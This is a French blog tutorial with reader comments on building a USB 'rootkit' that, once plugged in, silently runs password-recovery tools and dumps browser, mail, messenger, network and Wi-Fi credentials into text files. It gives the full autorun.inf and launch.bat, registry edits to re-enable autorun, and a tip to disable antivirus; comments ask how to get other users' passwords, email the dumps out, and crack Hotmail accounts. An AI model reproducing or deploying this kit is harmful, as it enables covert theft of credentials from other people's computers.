#69 Création d’un rootkit pour pirater les mots de passe d’un ordinateur.

Posté le 25 juil 2009 | Vu 9 143 fois16 Potins

Sous ce titre accrocheur, nous allons voir qu’avec un peut de bon sens, nous allons réaliser un script qui permet de scanner et déchiffrer les mots de passe de votre PC à l’aide d’une clé USB. Bon je sais ce n’est pas conficker, mais bon.

Dans un premier temps, nous allons récupérer plusieurs logiciels qui nous permettent de déchiffrer les mots de passe des applications les plus courantes. Toutes ces applications sont issu du site Nirsoft (ici)

MessenPass: récupère les mots de passe de messagerie instantanée le plus populaire des programmes: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger avec Netscape 7, Trillian, Miranda, GAIM et.

Mail PassView: récupère les mots de passe des programmes de messagerie suivants: Outlook Express, Microsoft Outlook 2000 (comptes POP3 et SMTP uniquement), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP et SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

IE Passview: IE PassView est un petit utilitaire qui révèle les mots de passe stockés par le navigateur Internet Explorer. Compatible avec le nouveau Internet Explorer 7.0, ainsi que les anciennes versions d’Internet Explorer v4.0 – v6.0

Protected Storage PassView: Récupère tous les mots de passe stockés dans le Protected Storage, y compris la saisie semi-automatique des mots de passe d’Internet Explorer, les mots de passe des sites protégés par mot de passe, mot de passe de MSN Explorer, et plus …

PasswordFox: PasswordFox est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Mozilla Firefox. Par défaut, PasswordFox affiche les mots de passe stockés dans votre profil actuel, mais vous pouvez facilement choisir de regarder les mots de passe de tout autre profil Firefox. Pour chaque mot de passe d’entrée, l’information suivante est affichée: Record Index, site web, nom d’utilisateur, mot de passe.

Network Password Recovery : Lorsque vous vous connectez à un partage réseau sur votre réseau local ou sur votre compte. NET Passport, Windows vous permet d’enregistrer votre mot de passe afin de l’utiliser à chaque fois que vous connectez sur le serveur distant. Cet utilitaire récupère tous les mots de passe réseau stockés sur votre système pour l’utilisateur connecté.

ChromePass : ChromePass est un petit outil qui vous permet d’afficher les noms d’utilisateur et mots de passe stockés par le navigateur Web Google Chrome. Pour chaque mot de passe, l’information suivante est affichée: URL Origine, URL action, le nom d’utilisateur, mot de passe et l’heure de création.

WirelessKeyView : WirelessKeyView récupère toutes les clés de réseau sans fil / mots de passe (WEP / WPA) stockés dans votre ordinateur par le service ‘Wireless Zero Configuration’ de Windows XP et par le service ‘WLAN AutoConfig’ de Windows Vista.

Créer un dossier RootKit sur votre bureau et téléchargez toutes les applications ci-dessus dedans.

Ensuite décompresser toutes les archives et gardez que les exécutable (.exe)

Copiez tous les fichiers .exe du répertoire à la racine de votre clé USB.

Ouvrer le bloc-note de windows et copier le texte suivant

[autorun]
open = launch.bat
ACTION = Scan Passwords

Puis enregistrez le fichier sous la racine de la clé sous le nom autorun.inf

Ouvrer un autre bloc-note et copier le texte suivant :

start ChromePass.exe /stext ChromePass.txt
start iepv.exe /stext iepv.txt
start mailpv.exe /stext mailpv.txt
start mspass.exe /stext mspass.txt
start netpass.exe /stext netpass.txt
start PasswordFox.exe /stext PasswordFox.txt
start pspv.exe /stext pspv.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt

Ensuite enregistrer votre document à la racine de votre clé, sous le nom de launch.bat

Votre rootkit est maintenant prêt. Nous allons le tester.

Sur certain ordinateur, comme le mien par exemple j’ai désactivé l’autorun, pour ce tutoriel je vais le réactiver. Ce rootkit fonctionne quand même il suffit juste dans le poste de travail de cliquer sur le fichier launch.bat pour lancer le rootkit, si l’autorun est désactivé.

Pour activer l’autorun pour tous les lecteurs, aller dans Menu Démarrer → Exécuter → (taper regedit.exe)

Dans l’arborescence de la base de registre aller dans : [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] et modifier la clé suivante, avec la valeur 91 « NoDriveTypeAutoRun »=dword:00000091

Redémarrer le PC. Ensuite insérer votre clé USB, un menu s’affiche et sélectionner Scan Password, la première option.

Maintenant, tous les outils de récupération de mot de passe seront exécutés silencieusement en arrière-plan (ce processus ne prend que quelques secondes). Les mots de passe sont stockés dans les fichiers .TXT.

Vous n’avez plus qu’a les ouvrir et voir les mots de passe déchiffrer. Je vous conseil de visiter régulièrement le site de NirSoft car des mises à jour ainsi que des nouveaux logiciels sortent souvent.

That’s All.

Difficulté :
Modification : -
Crédits : -

Autre(s) article(s) intéressant(s):

16 Potins »

yago_nfs_tm_91- dit:

le probleme c’est que les logiciel nirsoft sont quasiment tous détecter pas les antivirus !

pourquoi ne pas creer un lien pour télécharger tout ces programmes d’un coup ?

# 2 août 2009 à 22:15

navid dit:

Salut .
j’ai bien appliquer le tutoriel sauf que a la fin lorsque je met la clé USB et je sélectionne Scan Password, on me dis ouvrir avec !
je dois l’ouvrir avec quel programme ?? est se que j’ai commis une erreur ? parce que dans l’édition de la valeur DWORD j’ai trouver comme nom de valeur : HonorAutoRunSetting !

c’est quoi le problème ?
Merci de répondre dans le mail ou dans cet cite svp .

# 6 août 2009 à 20:09

navid dit:

NN merci voila ça marche merci beaucoup lol

# 6 août 2009 à 20:10

navid dit:

mais jai pas trouver les mot de passe des autres sessions ?! il y a rien meme les mot de passe des msn ! juste les mot de passe fire fox ( qu’on peut trouver facilement trouver dans le navigateur )

vous avez pas une solution pour trouver les mot de passe des autres sessions ?

# 6 août 2009 à 20:14

Zbug dit:

*

Salut .
j’ai bien appliquer le tutoriel sauf que a la fin lorsque je met la clé USB et je sélectionne Scan Password, on me dis ouvrir avec !
je dois l’ouvrir avec quel programme ?? est se que j’ai commis une erreur ? parce que dans l’édition de la valeur DWORD j’ai trouver comme nom de valeur : HonorAutoRunSetting !

c’est quoi le problème ?
Merci de répondre dans le mail ou dans cet cite svp .*

J’ai le même problème bien que en dehors de ca j’ai quand meme acces aux infos en allant sur le lauch.bat . Une petite réponse?
Je n’ai pas encore fait attention….peut-on avoir les mdp des différentes sessions utilisateurs des PCs?

# 14 août 2009 à 2:09

RedWine dit:

@ navid

ne fonctionne que si vous avez choisi le souvenir de votre mot de passe dans Windows Live Messenger

# 14 août 2009 à 8:45

apophis dit:

Je n’arrive pas a renommer le nom de la valeur dans l’édition DWORD
Que se passe t il ??

# 28 août 2009 à 22:36

Apophis dit:

Et en plus kan je met ma clé usb ya pas d’execution auto …

Je suis pas hyper bon en info donc j’ai vraiment besoin d’une aide pour debutant !

# 28 août 2009 à 22:50

Le Webmaster (auteur) dit:

Bonjour,

Pour que l’exécution automatique fonctionne, il faut modifier le contenu de la valeur « NoDriveTypeAutoRun » par le chiffre 91. Attention cependant à bien vérifier que la base est en Hexadécimale. Pour modifier le contenu d’une clé il suffit de double-cliquer dessus.

Pour que les modifications soient prises en compte, il faut redémarrer le PC.

Si vous avez un antivirus, essayer de le désactiver pour voir si ça fonctionne.

Cordialement.

# 29 août 2009 à 8:40

Carto dit:

Merci pour ce tuto bien expliqué et ma foi, fort simple !

Une petite erreur cependant : « Ensuite enregistrer votre document à la racine de votre clé, sous le nom de lauch.bat »

Dans la mesure ou fichier .inf est composé de :

[autorun]
open = launch.bat
ACTION = Scan Passwords

Il faut un fichier launch.bat et non lach.bat…

Je pense que peu d’entre vous sont tombés dans le panneau mais on ne sait jamais.

Pour ma part, le rootkit marche à la prefection et Avast n’y voit que du Feu …

# 23 novembre 2009 à 12:19

Le Webmaster (auteur) dit:

Merci,

La coquille a été corrigée.

A bientôt sur Quick-Tutoriel.com

# 23 novembre 2009 à 13:05

Molive dit:

Bonjour
J’ai suivie la procédure mais la clés ne démarre pas en automatique sur mon PC ?

Peut on l’utiliser aussi sur mon Mac ?

# 14 janvier 2010 à 14:51

Le Webmaster (auteur) dit:

Bonsoir,

Non on ne peut pas l’utiliser sur MAC, ces logiciels ne sont compatibles que pour le monde PC. Pour l’exécution automatique regarde dans les commentaires. Il y a quelques temps voici ce que j’ai ecrit :

Bonjour,

Pour que l’exécution automatique fonctionne, il faut modifier le contenu de la valeur « NoDriveTypeAutoRun » par le chiffre 91. Attention cependant à bien vérifier que la base est en Hexadécimale. Pour modifier le contenu d’une clé il suffit de double-cliquer dessus.

Pour que les modifications soient prises en compte, il faut redémarrer le PC.

Si vous avez un antivirus, essayer de le désactiver pour voir si ça fonctionne.

A bientôt sur Quick-Tutoriel.com

# 14 janvier 2010 à 18:29

X-Side dit:

Bonjour
Est-ce qu’il serait possible de faire une commande qui permette d’envoyer par mails les documents .txt qui contiennent les passwords.
Merci

# 29 juin 2010 à 19:13

lucky dit:

salut tres bon tuto et tres bon site
mais iepv ne m affiche pas les mot de passe facebook
comment i remédier et aussi connaisai vous un logiciel pour trouver les mots de passe hotmail
merci bien
lucky

# 22 juillet 2010 à 9:19

Jean DRIMON dit:

Voila ce qu’il faut http://www.hacker-msn.org